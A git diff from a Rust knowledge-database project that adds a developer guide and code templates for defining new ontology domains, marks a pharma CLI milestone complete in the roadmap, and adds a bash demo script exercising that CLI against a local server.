||||
/// the actual file size. This ensures that `read()` operations can use
|
||||
/// the cached size for bounds checking without a disk stat call.
|
||||
pub fn update_current_segment_size(&mut self, new_size: u64) {
|
||||
if let Some(segment) = self.segments.last_mut() {
|
||||
segment.size = new_size;
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new segment with the given base offset.
|
||||
///
|
||||
/// Writes a v2 FileHeader to the new file and adds it to the segment list.
|
||||
|
||||
590
docs/guides/adding-a-domain.md
Normal file
590
docs/guides/adding-a-domain.md
Normal file
@ -0,0 +1,590 @@
|
||||
# Adding a New Domain to stemedb-ontology
|
||||
|
||||
This guide walks you through implementing a new domain (vertical) in the stemedb-ontology crate. By the end, you'll have a working domain with entity types, predicate schemas, and optional extractors.
|
||||
|
||||
**Time:** ~30 minutes
|
||||
**Prerequisites:** Rust knowledge, familiarity with StemeDB concepts
|
||||
|
||||
## Overview
|
||||
|
||||
A domain in stemedb-ontology defines:
|
||||
|
||||
1. **Entity Types** - The kinds of things in your domain (e.g., Drug, Company, Asset)
|
||||
2. **Predicate Schemas** - How subjects are built for different predicate categories
|
||||
3. **Source Hierarchy** - How to weight different source authorities
|
||||
4. **Extractors (optional)** - Code that extracts claims from external sources
|
||||
|
||||
## Step 1: Plan Your Domain Model
|
||||
|
||||
Before writing code, answer these questions:
|
||||
|
||||
### What entities exist in your domain?
|
||||
|
||||
| Entity | Description | Example Values |
|
||||
|--------|-------------|----------------|
|
||||
| ? | ? | ? |
|
||||
|
||||
**Pharma example:**
|
||||
| Entity | Description | Example Values |
|
||||
|--------|-------------|----------------|
|
||||
| Drug | Pharmaceutical compound | Semaglutide, Tirzepatide |
|
||||
| Indication | Medical condition | Type2Diabetes, Obesity |
|
||||
| Target | Molecular target | GLP1R, GIPR |
|
||||
|
||||
### What predicates will you track?
|
||||
|
||||
Group predicates by category (determines subject pattern):
|
||||
|
||||
| Category | Subject Pattern | Example Predicates |
|
||||
|----------|-----------------|-------------------|
|
||||
| ? | ? | ? |
|
||||
|
||||
**Pharma example:**
|
||||
| Category | Subject Pattern | Example Predicates |
|
||||
|----------|-----------------|-------------------|
|
||||
| Efficacy | `{Drug}:{Indication}` | hba1c_reduction_percent, weight_loss_percent |
|
||||
| Safety | `{Drug}` | nausea_rate, has_boxed_warning |
|
||||
| Mechanism | `{Drug}:{Target}` | binding_affinity, mechanism_of_action |
|
||||
|
||||
### What sources will provide data?
|
||||
|
||||
Order from most to least authoritative:
|
||||
|
||||
| Tier | Source Class | Examples | Weight |
|
||||
|------|--------------|----------|--------|
|
||||
| 0 | Regulatory | ? | 1.0 |
|
||||
| 1 | Clinical | ? | 0.9 |
|
||||
| ... | ... | ... | ... |
|
||||
|
||||
## Step 2: Create Domain Module
|
||||
|
||||
Create the directory structure:
|
||||
|
||||
```
|
||||
crates/stemedb-ontology/src/
|
||||
{domain}/
|
||||
mod.rs # Re-exports
|
||||
definition.rs # Domain::new() builder
|
||||
```
|
||||
|
||||
### Template: `{domain}/mod.rs`
|
||||
|
||||
```rust
|
||||
//! {Domain} domain ontology.
|
||||
//!
|
||||
//! This module defines the {domain} vertical with:
|
||||
//! - Entity types (...)
|
||||
//! - Predicate schemas (...)
|
||||
//! - Source hierarchy (...)
|
||||
|
||||
pub mod definition;
|
||||
|
||||
pub use definition::definition;
|
||||
|
||||
// Re-export domain-specific types if any
|
||||
// pub use definition::{...};
|
||||
```
|
||||
|
||||
### Template: `{domain}/definition.rs`
|
||||
|
||||
```rust
|
||||
//! Compiled-in {domain} domain definition.
|
||||
|
||||
use crate::domain::{
|
||||
DefaultLens, Domain, EntityType, NamingConvention, PredicateSchema, SourceTier,
|
||||
};
|
||||
use stemedb_core::types::SourceClass;
|
||||
|
||||
/// Build the {domain} domain definition.
|
||||
pub fn definition() -> Domain {
|
||||
let mut domain = Domain::new(
|
||||
"{Domain}",
|
||||
"Description of what this domain covers",
|
||||
);
|
||||
|
||||
// -------------------------------------------------------------------------
|
||||
// Entity Types
|
||||
// -------------------------------------------------------------------------
|
||||
|
||||
// Primary entity (e.g., the main subject of claims)
|
||||
domain = domain.with_entity_type(
|
||||
"{PrimaryEntity}",
|
||||
EntityType::required("Description")
|
||||
.with_naming(NamingConvention::CamelCase)
|
||||
// Add aliases for common variations
|
||||
.with_alias("ALIAS", "Canonical"),
|
||||
);
|
||||
|
||||
// Secondary entity (for compound subjects)
|
||||
domain = domain.with_entity_type(
|
||||
"{SecondaryEntity}",
|
||||
EntityType::required("Description")
|
||||
.with_naming(NamingConvention::CamelCase),
|
||||
);
|
||||
|
||||
// -------------------------------------------------------------------------
|
||||
// Predicate Schemas
|
||||
// -------------------------------------------------------------------------
|
||||
|
||||
// Category 1: Primary predicates (single entity subject)
|
||||
domain = domain.with_predicate_schema(
|
||||
"category1",
|
||||
PredicateSchema::new(
|
||||
"Description of this predicate category",
|
||||
"{PrimaryEntity}",
|
||||
)
|
||||
.with_predicates(vec![
|
||||
"predicate_one",
|
||||
"predicate_two",
|
||||
])
|
||||
.with_default_lens(DefaultLens::Recency),
|
||||
);
|
||||
|
||||
// Category 2: Compound predicates (multi-entity subject)
|
||||
domain = domain.with_predicate_schema(
|
||||
"category2",
|
||||
PredicateSchema::new(
|
||||
"Description",
|
||||
"{PrimaryEntity}:{SecondaryEntity}",
|
||||
)
|
||||
.with_predicates(vec![
|
||||
"compound_predicate",
|
||||
])
|
||||
.with_default_lens(DefaultLens::LayeredConsensus),
|
||||
);
|
||||
|
||||
// -------------------------------------------------------------------------
|
||||
// Source Hierarchy
|
||||
// -------------------------------------------------------------------------
|
||||
|
||||
domain = domain.with_source_hierarchy(vec![
|
||||
SourceTier::new(SourceClass::Regulatory, "Tier 0: Official Sources")
|
||||
.with_examples(vec!["Government agencies", "Standards bodies"])
|
||||
.with_weight(1.0),
|
||||
SourceTier::new(SourceClass::Clinical, "Tier 1: Primary Research")
|
||||
.with_examples(vec!["Peer-reviewed journals", "Research institutions"])
|
||||
.with_weight(0.9)
|
||||
.with_decay(730), // 2 year half-life
|
||||
SourceTier::new(SourceClass::Observational, "Tier 2: Secondary Analysis")
|
||||
.with_examples(vec!["Industry reports", "Analyst research"])
|
||||
.with_weight(0.7)
|
||||
.with_decay(365),
|
||||
SourceTier::new(SourceClass::Expert, "Tier 3: Expert Opinion")
|
||||
.with_examples(vec!["Industry experts", "Consultants"])
|
||||
.with_weight(0.5)
|
||||
.with_decay(180),
|
||||
SourceTier::new(SourceClass::Community, "Tier 4: Community")
|
||||
.with_examples(vec!["Professional forums", "Curated discussions"])
|
||||
.with_weight(0.3)
|
||||
.with_decay(90),
|
||||
SourceTier::new(SourceClass::Anecdotal, "Tier 5: Anecdotal")
|
||||
.with_examples(vec!["Social media", "Blog posts"])
|
||||
.with_weight(0.1)
|
||||
.with_decay(30),
|
||||
]);
|
||||
|
||||
domain
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_definition_builds() {
|
||||
let domain = definition();
|
||||
assert_eq!(domain.name, "{Domain}");
|
||||
assert!(!domain.entity_types.is_empty());
|
||||
assert!(!domain.predicate_schemas.is_empty());
|
||||
assert!(!domain.source_hierarchy.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_entity_normalization() {
|
||||
let domain = definition();
|
||||
let entity = domain.get_entity_type("{PrimaryEntity}").expect("entity exists");
|
||||
|
||||
// Test alias normalization
|
||||
assert_eq!(entity.normalize("ALIAS"), "Canonical");
|
||||
assert_eq!(entity.normalize("Canonical"), "Canonical");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_predicate_schema_lookup() {
|
||||
let domain = definition();
|
||||
|
||||
// Direct lookup
|
||||
let schema = domain.get_schema("category1").expect("schema exists");
|
||||
assert_eq!(schema.subject_pattern, "{PrimaryEntity}");
|
||||
|
||||
// Lookup by predicate
|
||||
let schema = domain.schema_for_predicate("predicate_one").expect("found");
|
||||
assert!(schema.predicates.contains(&"predicate_one".to_string()));
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Step 3: Implement Extractors (Optional)
|
||||
|
||||
If your domain has external data sources, implement the `MedicalExtractor` trait.
|
||||
|
||||
### Directory Structure
|
||||
|
||||
```
|
||||
crates/stemedb-ontology/src/
|
||||
{domain}/
|
||||
mod.rs
|
||||
definition.rs
|
||||
extractors/
|
||||
mod.rs
|
||||
{source}.rs
|
||||
```
|
||||
|
||||
### Template: `{domain}/extractors/mod.rs`
|
||||
|
||||
```rust
|
||||
//! Data extractors for {domain}.
|
||||
|
||||
mod {source};
|
||||
|
||||
pub use {source}::{Source}Extractor;
|
||||
|
||||
// Re-export common traits from parent
|
||||
pub use crate::pharma::extractors::{
|
||||
ExtractError, MedicalClaim, MedicalExtractor, RetryConfig, SourceInput,
|
||||
};
|
||||
```
|
||||
|
||||
### Template: `{domain}/extractors/{source}.rs`
|
||||
|
||||
```rust
|
||||
//! {Source} data extractor.
|
||||
|
||||
use super::{ExtractError, MedicalClaim, MedicalExtractor, SourceInput};
|
||||
use async_trait::async_trait;
|
||||
use stemedb_core::types::{ObjectValue, SourceClass};
|
||||
|
||||
/// Extractor for {Source} data.
|
||||
pub struct {Source}Extractor {
|
||||
http_client: reqwest::Client,
|
||||
base_url: String,
|
||||
}
|
||||
|
||||
impl {Source}Extractor {
|
||||
/// Create a new extractor.
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
http_client: reqwest::Client::new(),
|
||||
base_url: "https://api.example.com".to_string(),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for {Source}Extractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl MedicalExtractor for {Source}Extractor {
|
||||
fn name(&self) -> &str {
|
||||
"{Source} Extractor"
|
||||
}
|
||||
|
||||
fn source_class(&self) -> SourceClass {
|
||||
SourceClass::Regulatory // Adjust based on source authority
|
||||
}
|
||||
|
||||
fn can_handle(&self, source: &SourceInput) -> bool {
|
||||
matches!(source, SourceInput::DrugName(_) | SourceInput::Url(_))
|
||||
}
|
||||
|
||||
async fn extract(&self, source: &SourceInput) -> Result<Vec<MedicalClaim>, ExtractError> {
|
||||
let query = match source {
|
||||
SourceInput::DrugName(name) => name.clone(),
|
||||
SourceInput::Url(url) => url.clone(),
|
||||
_ => return Err(ExtractError::NotFound("Unsupported input type".into())),
|
||||
};
|
||||
|
||||
// Fetch data from source
|
||||
let url = format!("{}/search?q={}", self.base_url, urlencoding::encode(&query));
|
||||
let response = self.http_client.get(&url).send().await?;
|
||||
|
||||
if !response.status().is_success() {
|
||||
return Err(ExtractError::ApiError(format!(
|
||||
"HTTP {}", response.status()
|
||||
)));
|
||||
}
|
||||
|
||||
// Parse response and extract claims
|
||||
let mut claims = Vec::new();
|
||||
|
||||
// Example claim
|
||||
claims.push(
|
||||
MedicalClaim::new(
|
||||
"Subject",
|
||||
"predicate_name",
|
||||
ObjectValue::Float(42.0),
|
||||
)
|
||||
.with_confidence(0.9)
|
||||
.with_source_url(&url)
|
||||
.with_source_section("Section Name")
|
||||
.with_quote("Supporting quote from source")
|
||||
.with_source_class(self.source_class())
|
||||
);
|
||||
|
||||
Ok(claims)
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Step 4: Create CLI Binary (Optional)
|
||||
|
||||
For user-facing domains, create a CLI tool.
|
||||
|
||||
### Template: `src/bin/steme_{domain}.rs`
|
||||
|
||||
```rust
|
||||
//! CLI for {domain} domain operations.
|
||||
|
||||
use clap::Parser;
|
||||
use stemedb_ontology::client::StemeClient;
|
||||
use stemedb_ontology::{domain}::definition;
|
||||
|
||||
mod cli;
|
||||
mod commands;
|
||||
|
||||
#[derive(Parser)]
|
||||
#[command(name = "steme-{domain}")]
|
||||
#[command(about = "{Domain} data operations for StemeDB")]
|
||||
struct Cli {
|
||||
#[arg(long, default_value = "http://localhost:18180")]
|
||||
server: String,
|
||||
|
||||
#[command(subcommand)]
|
||||
command: Commands,
|
||||
}
|
||||
|
||||
#[derive(clap::Subcommand)]
|
||||
enum Commands {
|
||||
/// Ingest data
|
||||
Ingest { /* args */ },
|
||||
/// Query data
|
||||
Query { /* args */ },
|
||||
}
|
||||
|
||||
#[tokio::main]
|
||||
async fn main() -> Result<(), Box<dyn std::error::Error>> {
|
||||
let cli = Cli::parse();
|
||||
let client = StemeClient::new(&cli.server);
|
||||
|
||||
match cli.command {
|
||||
Commands::Ingest { /* args */ } => {
|
||||
// Implementation
|
||||
}
|
||||
Commands::Query { /* args */ } => {
|
||||
// Implementation
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
```
|
||||
|
||||
## Step 5: Testing Checklist
|
||||
|
||||
Before considering your domain complete:
|
||||
|
||||
- [ ] `cargo build -p stemedb-ontology` succeeds
|
||||
- [ ] `definition()` returns a valid Domain
|
||||
- [ ] All entity types have meaningful descriptions
|
||||
- [ ] All predicate schemas have correct subject patterns
|
||||
- [ ] Entity normalization works (aliases resolve correctly)
|
||||
- [ ] `schema_for_predicate()` finds the right schema
|
||||
- [ ] Source hierarchy has 6 tiers with decreasing weights
|
||||
- [ ] (If extractors) `cargo test -p stemedb-ontology` passes
|
||||
|
||||
Run the tests:
|
||||
|
||||
```bash
|
||||
cargo test -p stemedb-ontology
|
||||
cargo clippy -p stemedb-ontology -- -D warnings
|
||||
```
|
||||
|
||||
## Step 6: Integration
|
||||
|
||||
### Export from lib.rs
|
||||
|
||||
Edit `crates/stemedb-ontology/src/lib.rs`:
|
||||
|
||||
```rust
|
||||
// Add your domain module
|
||||
pub mod {domain};
|
||||
|
||||
// Re-export for convenience
|
||||
pub use {domain}::definition as {domain}_domain;
|
||||
```
|
||||
|
||||
### Update ai-lookup
|
||||
|
||||
Add entry to `ai-lookup/index.md` under Domain Ontology section.
|
||||
|
||||
### Update CLAUDE.md routing (if significant)
|
||||
|
||||
If your domain is frequently used, add a routing entry in the Find Your Guide table.
|
||||
|
||||
## Complete Example: Cardiology Domain (Skeleton)
|
||||
|
||||
Here's a minimal working example for a cardiology domain:
|
||||
|
||||
```rust
|
||||
// crates/stemedb-ontology/src/cardiology/mod.rs
|
||||
//! Cardiology domain ontology.
|
||||
|
||||
pub mod definition;
|
||||
pub use definition::definition;
|
||||
```
|
||||
|
||||
```rust
|
||||
// crates/stemedb-ontology/src/cardiology/definition.rs
|
||||
use crate::domain::{DefaultLens, Domain, EntityType, NamingConvention, PredicateSchema, SourceTier};
|
||||
use stemedb_core::types::SourceClass;
|
||||
|
||||
pub fn definition() -> Domain {
|
||||
let mut domain = Domain::new(
|
||||
"Cardiology",
|
||||
"Cardiovascular conditions, procedures, and outcomes",
|
||||
);
|
||||
|
||||
// Entities
|
||||
domain = domain
|
||||
.with_entity_type(
|
||||
"Condition",
|
||||
EntityType::required("Cardiovascular condition")
|
||||
.with_naming(NamingConvention::CamelCase)
|
||||
.with_alias("MI", "MyocardialInfarction")
|
||||
.with_alias("CHF", "CongestiveHeartFailure")
|
||||
.with_alias("AF", "AtrialFibrillation"),
|
||||
)
|
||||
.with_entity_type(
|
||||
"Procedure",
|
||||
EntityType::required("Medical procedure")
|
||||
.with_naming(NamingConvention::CamelCase)
|
||||
.with_alias("CABG", "CoronaryArteryBypassGraft")
|
||||
.with_alias("PCI", "PercutaneousCoronaryIntervention"),
|
||||
)
|
||||
.with_entity_type(
|
||||
"Biomarker",
|
||||
EntityType::required("Diagnostic biomarker")
|
||||
.with_naming(NamingConvention::CamelCase),
|
||||
);
|
||||
|
||||
// Schemas
|
||||
domain = domain
|
||||
.with_predicate_schema(
|
||||
"diagnosis",
|
||||
PredicateSchema::new("Diagnostic criteria", "{Condition}")
|
||||
.with_predicates(vec![
|
||||
"diagnostic_criteria",
|
||||
"staging_system",
|
||||
"severity_classification",
|
||||
])
|
||||
.with_default_lens(DefaultLens::Authority),
|
||||
)
|
||||
.with_predicate_schema(
|
||||
"outcome",
|
||||
PredicateSchema::new("Treatment outcomes", "{Condition}:{Procedure}")
|
||||
.with_predicates(vec![
|
||||
"mortality_rate",
|
||||
"complication_rate",
|
||||
"readmission_rate",
|
||||
"length_of_stay_days",
|
||||
])
|
||||
.with_default_lens(DefaultLens::LayeredConsensus),
|
||||
)
|
||||
.with_predicate_schema(
|
||||
"biomarker",
|
||||
PredicateSchema::new("Biomarker thresholds", "{Biomarker}")
|
||||
.with_predicates(vec![
|
||||
"normal_range",
|
||||
"diagnostic_threshold",
|
||||
"prognostic_value",
|
||||
])
|
||||
.with_default_lens(DefaultLens::Consensus),
|
||||
);
|
||||
|
||||
// Source hierarchy
|
||||
domain = domain.with_source_hierarchy(vec![
|
||||
SourceTier::new(SourceClass::Regulatory, "Tier 0: Guidelines")
|
||||
.with_examples(vec!["ACC/AHA Guidelines", "ESC Guidelines"])
|
||||
.with_weight(1.0),
|
||||
SourceTier::new(SourceClass::Clinical, "Tier 1: Clinical Trials")
|
||||
.with_examples(vec!["Landmark RCTs", "Meta-analyses"])
|
||||
.with_weight(0.9)
|
||||
.with_decay(730),
|
||||
SourceTier::new(SourceClass::Observational, "Tier 2: Registries")
|
||||
.with_examples(vec!["NCDR", "Get With The Guidelines"])
|
||||
.with_weight(0.7)
|
||||
.with_decay(365),
|
||||
SourceTier::new(SourceClass::Expert, "Tier 3: Expert Consensus")
|
||||
.with_examples(vec!["Consensus statements", "Textbooks"])
|
||||
.with_weight(0.5)
|
||||
.with_decay(180),
|
||||
SourceTier::new(SourceClass::Community, "Tier 4: Community")
|
||||
.with_examples(vec!["Medical forums", "CME discussions"])
|
||||
.with_weight(0.3)
|
||||
.with_decay(90),
|
||||
SourceTier::new(SourceClass::Anecdotal, "Tier 5: Anecdotal")
|
||||
.with_examples(vec!["Case reports", "Social media"])
|
||||
.with_weight(0.1)
|
||||
.with_decay(30),
|
||||
]);
|
||||
|
||||
domain
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_cardiology_domain() {
|
||||
let domain = definition();
|
||||
assert_eq!(domain.name, "Cardiology");
|
||||
|
||||
// Check entity aliases
|
||||
let condition = domain.get_entity_type("Condition").unwrap();
|
||||
assert_eq!(condition.normalize("MI"), "MyocardialInfarction");
|
||||
|
||||
// Check schema lookup
|
||||
let schema = domain.schema_for_predicate("mortality_rate").unwrap();
|
||||
assert_eq!(schema.subject_pattern, "{Condition}:{Procedure}");
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### "Unknown predicate" errors
|
||||
|
||||
Your predicate isn't in any schema. Add it to the appropriate `with_predicates()` call.
|
||||
|
||||
### Subject collision issues
|
||||
|
||||
If claims that should conflict aren't conflicting, check that:
|
||||
1. The subject pattern matches your intent
|
||||
2. Entity values are being normalized consistently
|
||||
3. The predicate is in the right schema category
|
||||
|
||||
### Extractor not finding data
|
||||
|
||||
1. Check the API URL is correct
|
||||
2. Verify the query parameters match the API's expectations
|
||||
3. Add debug logging to see raw responses
|
||||
|
||||
## Next Steps
|
||||
|
||||
- Run the Consumer Health UAT to see the pharma domain in action
|
||||
- Read the [Lens documentation](../services/lens.md) to understand conflict resolution
|
||||
- Check the [SDK guide](../../ai-lookup/services/sdk.md) for Go integration
|
||||
20
roadmap.md
20
roadmap.md
@ -44,7 +44,7 @@
|
||||
| **Time Travel Works** | `as_of=2024-01-01` returns historical snapshot | ✅ Infrastructure ready |
|
||||
| **Decay Works** | 6-month-old Reddit claim has lower effective confidence than fresh FDA | ✅ Infrastructure ready |
|
||||
| **UAT Passes** | Consumer Health scenarios documented and verified | ✅ Week 4 |
|
||||
| **Self-Serve Demo** | CLI tool lets anyone explore without code | 🚧 Week 5 |
|
||||
| **Self-Serve Demo** | CLI tool lets anyone explore without code | ✅ Week 5 |
|
||||
|
||||
### The Demo Script
|
||||
|
||||
@ -76,7 +76,7 @@
|
||||
| **Week 2** ✅ | FDA extractor, claim-to-assertion signing | Ontology | Week 1 |
|
||||
| **Week 3** ✅ | Ingest FDA claims, mock conflicts, SkepticLens demo | Ontology | Week 2 |
|
||||
| **Week 4** ✅ | UAT scenarios documented and verified | Ontology | Week 3 |
|
||||
| **Week 5** | `steme-pharma` CLI for self-serve exploration | Ontology | Week 3 |
|
||||
| **Week 5** ✅ | `steme-pharma` CLI for self-serve exploration | Ontology | Week 3 |
|
||||
| **Week 6** | Polish, factor out reusable patterns, document | Ontology | Week 4-5 |
|
||||
|
||||
### What's NOT in MVP
|
||||
@ -1346,11 +1346,10 @@ These are valuable but not required to prove the core value proposition:
|
||||
* [x] **Week 2**: FDA Extractor + Signing — `FdaLabelExtractor`, `MedicalClaim::to_assertion()`, exponential backoff. ✅ COMPLETE
|
||||
* [x] **Week 3**: StemeDB Integration — `StemeClient`, `pharma-ingest` CLI, mock conflict demo. ✅ COMPLETE
|
||||
* [x] **Week 4**: UAT Scenarios — Document acceptance criteria, validation tests. ✅ COMPLETE
|
||||
* [ ] **Week 5**: CLI Tool — `steme-pharma` CLI for ingest/query/compare.
|
||||
* [x] **Week 5**: CLI Tool — `steme-pharma` CLI for ingest/query/compare. ✅ COMPLETE
|
||||
* [ ] **Week 6**: Generalization — Factor out reusable patterns, document "Adding a Domain".
|
||||
|
||||
### Next Up
|
||||
* **Week 5 MVP**: Full `steme-pharma` CLI with query, compare, and explore commands.
|
||||
* **Week 6 MVP**: Factor out reusable patterns, document "Adding a Domain" guide.
|
||||
* **Phase 8B-C** (deferred): Observability, geo-distribution — production concerns, not MVP blockers.
|
||||
|
||||
@ -1363,6 +1362,14 @@ These are valuable but not required to prove the core value proposition:
|
||||
* **Agent Wallet** (Key management sidecar) -> App layer.
|
||||
|
||||
### Recently Completed
|
||||
* [x] **🎯 MVP Week 5**: `steme-pharma` CLI for self-serve exploration.
|
||||
* Full CLI binary with 5 subcommands: `ingest`, `query`, `compare`, `explore`, `validate`.
|
||||
* Query modes: `skeptic` (default), `layered` (per-tier), and lens-based (recency, consensus, etc.).
|
||||
* Table and JSON output formats via `comfy-table`.
|
||||
* Client extensions: `layered()`, `query()`, `list_predicates()` methods.
|
||||
* Response DTOs: `LayeredResponse`, `QueryResponse`, `AssertionDto`, `TierResolutionDto`.
|
||||
* Domain validation for known pharma predicates and subject patterns.
|
||||
* Modular design: cli.rs, commands.rs, helpers.rs, output.rs.
|
||||
* [x] **🎯 MVP Week 4**: UAT scenarios documented and verified.
|
||||
* Integration test suite: `crates/stemedb-ontology/tests/consumer_health_uat.rs`
|
||||
* 4 automated UAT scenarios with real Ed25519 signing
|
||||
@ -1597,7 +1604,10 @@ INFRASTRUCTURE (Complete) VERTICAL INTEGRATION (In Progress)
|
||||
[stemedb-ontology Weeks 1-3] ✅ ───────────────────────┘
|
||||
(Domain defs, FDA extractor, StemeClient) |
|
||||
v
|
||||
[MVP Week 5: CLI Tool] [ ]
|
||||
[MVP Week 5: CLI Tool] ✅
|
||||
|
|
||||
v
|
||||
[MVP Week 6: Polish & Docs] [ ]
|
||||
|
|
||||
v
|
||||
🎯 CONSUMER HEALTH MVP
|
||||
|
||||
239
scripts/demo-consumer-health.sh
Executable file
239
scripts/demo-consumer-health.sh
Executable file
@ -0,0 +1,239 @@
|
||||
#!/usr/bin/env bash
|
||||
# Consumer Health Demo Script
|
||||
# Demonstrates StemeDB + stemedb-ontology for the Consumer Health use case
|
||||
#
|
||||
# Prerequisites:
|
||||
# - StemeDB API running: cargo run -p stemedb-api
|
||||
# - steme-pharma built: cargo build -p stemedb-ontology
|
||||
#
|
||||
# Usage:
|
||||
# ./scripts/demo-consumer-health.sh
|
||||
|
||||
set -e
|
||||
|
||||
# Colors
|
||||
RED='\033[0;31m'
|
||||
GREEN='\033[0;32m'
|
||||
YELLOW='\033[1;33m'
|
||||
BLUE='\033[0;34m'
|
||||
CYAN='\033[0;36m'
|
||||
BOLD='\033[1m'
|
||||
NC='\033[0m' # No Color
|
||||
|
||||
# Configuration
|
||||
STEMEDB_URL="${STEMEDB_URL:-http://localhost:18180}"
|
||||
PHARMA_CLI="./target/release/steme-pharma"
|
||||
PAUSE_SECONDS=2
|
||||
|
||||
# Helper functions
|
||||
print_header() {
|
||||
echo -e "\n${BOLD}${BLUE}════════════════════════════════════════════════════════════════${NC}"
|
||||
echo -e "${BOLD}${BLUE} $1${NC}"
|
||||
echo -e "${BOLD}${BLUE}════════════════════════════════════════════════════════════════${NC}\n"
|
||||
}
|
||||
|
||||
print_step() {
|
||||
echo -e "${CYAN}▶ $1${NC}"
|
||||
}
|
||||
|
||||
print_success() {
|
||||
echo -e "${GREEN}✓ $1${NC}"
|
||||
}
|
||||
|
||||
print_warning() {
|
||||
echo -e "${YELLOW}⚠ $1${NC}"
|
||||
}
|
||||
|
||||
print_error() {
|
||||
echo -e "${RED}✗ $1${NC}"
|
||||
}
|
||||
|
||||
wait_for_user() {
|
||||
if [ -t 0 ]; then
|
||||
echo -e "\n${YELLOW}Press Enter to continue...${NC}"
|
||||
read -r
|
||||
else
|
||||
sleep $PAUSE_SECONDS
|
||||
fi
|
||||
}
|
||||
|
||||
# Check prerequisites
|
||||
print_header "Consumer Health Demo - Prerequisites Check"
|
||||
|
||||
# Check if steme-pharma exists
|
||||
if [ ! -f "$PHARMA_CLI" ]; then
|
||||
print_warning "steme-pharma not found at $PHARMA_CLI"
|
||||
print_step "Building steme-pharma..."
|
||||
cargo build --release -p stemedb-ontology
|
||||
fi
|
||||
|
||||
# Check if StemeDB is running
|
||||
print_step "Checking StemeDB connection..."
|
||||
if curl -s "${STEMEDB_URL}/v1/health" > /dev/null 2>&1; then
|
||||
print_success "StemeDB is running at $STEMEDB_URL"
|
||||
else
|
||||
print_error "StemeDB not reachable at $STEMEDB_URL"
|
||||
echo -e "\nStart StemeDB with:"
|
||||
echo -e " ${CYAN}cargo run -p stemedb-api${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# ============================================================================
|
||||
# STEP 1: Ingest FDA Data + Mock Conflicts
|
||||
# ============================================================================
|
||||
print_header "Step 1: Ingest FDA Data + Mock Conflicts"
|
||||
|
||||
print_step "Ingesting FDA label data for Semaglutide and Tirzepatide..."
|
||||
print_step "Adding mock conflicts (simulating social media contradictions)..."
|
||||
echo ""
|
||||
|
||||
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" ingest "semaglutide,tirzepatide" --with-conflicts
|
||||
|
||||
print_success "Data ingested with mock conflicts"
|
||||
wait_for_user
|
||||
|
||||
# ============================================================================
|
||||
# STEP 2: Conflict Detection (Skeptic Lens)
|
||||
# ============================================================================
|
||||
print_header "Step 2: Conflict Detection (Skeptic Lens)"
|
||||
|
||||
echo -e "${BOLD}Question:${NC} What do different sources say about Semaglutide's nausea rate?"
|
||||
echo -e "${BOLD}Lens:${NC} Skeptic (shows all claims, highlights disagreements)\n"
|
||||
|
||||
print_step "Querying nausea_rate with Skeptic lens..."
|
||||
echo ""
|
||||
|
||||
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" query "Semaglutide" "nausea_rate" --mode skeptic
|
||||
|
||||
echo -e "\n${YELLOW}Note:${NC} The conflict score indicates disagreement between sources."
|
||||
echo -e "FDA (Regulatory tier) reports clinical trial data."
|
||||
echo -e "Reddit (Anecdotal tier) reports user experiences."
|
||||
wait_for_user
|
||||
|
||||
# ============================================================================
|
||||
# STEP 3: Source Hierarchy (Layered Consensus)
|
||||
# ============================================================================
|
||||
print_header "Step 3: Source Hierarchy (Layered Consensus)"
|
||||
|
||||
echo -e "${BOLD}Question:${NC} What's the consensus on HbA1c reduction, broken down by source tier?"
|
||||
echo -e "${BOLD}Lens:${NC} LayeredConsensus (shows per-tier agreement)\n"
|
||||
|
||||
print_step "Querying hba1c_reduction_percent with Layered Consensus..."
|
||||
echo ""
|
||||
|
||||
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" query "Semaglutide:Type2Diabetes" "hba1c_reduction_percent" --mode layered
|
||||
|
||||
echo -e "\n${YELLOW}Note:${NC} Each tier shows its own consensus."
|
||||
echo -e "Higher tiers (Regulatory, Clinical) have more weight in final resolution."
|
||||
wait_for_user
|
||||
|
||||
# ============================================================================
|
||||
# STEP 4: Drug Comparison
|
||||
# ============================================================================
|
||||
print_header "Step 4: Drug Comparison"
|
||||
|
||||
echo -e "${BOLD}Question:${NC} How do Semaglutide and Tirzepatide compare on weight loss?"
|
||||
echo -e "${BOLD}Method:${NC} Side-by-side query of both subjects\n"
|
||||
|
||||
print_step "Comparing weight_loss_percent..."
|
||||
echo ""
|
||||
|
||||
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" compare \
|
||||
"Semaglutide:Type2Diabetes" \
|
||||
"Tirzepatide:Type2Diabetes" \
|
||||
--predicate "weight_loss_percent"
|
||||
|
||||
echo -e "\n${YELLOW}Note:${NC} Both drugs' claims are shown with conflict scores."
|
||||
echo -e "A consumer can see both FDA data and community reports."
|
||||
wait_for_user
|
||||
|
||||
# ============================================================================
|
||||
# STEP 5: Explore Available Data
|
||||
# ============================================================================
|
||||
print_header "Step 5: Explore Available Data"
|
||||
|
||||
echo -e "${BOLD}Question:${NC} What predicates are available for Semaglutide?"
|
||||
echo -e "${BOLD}Method:${NC} List all predicates with assertions for this subject\n"
|
||||
|
||||
print_step "Exploring Semaglutide predicates..."
|
||||
echo ""
|
||||
|
||||
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" explore "Semaglutide:Type2Diabetes"
|
||||
|
||||
echo ""
|
||||
|
||||
print_step "Exploring Semaglutide safety predicates..."
|
||||
echo ""
|
||||
|
||||
$PHARMA_CLI --stemedb-url "$STEMEDB_URL" explore "Semaglutide"
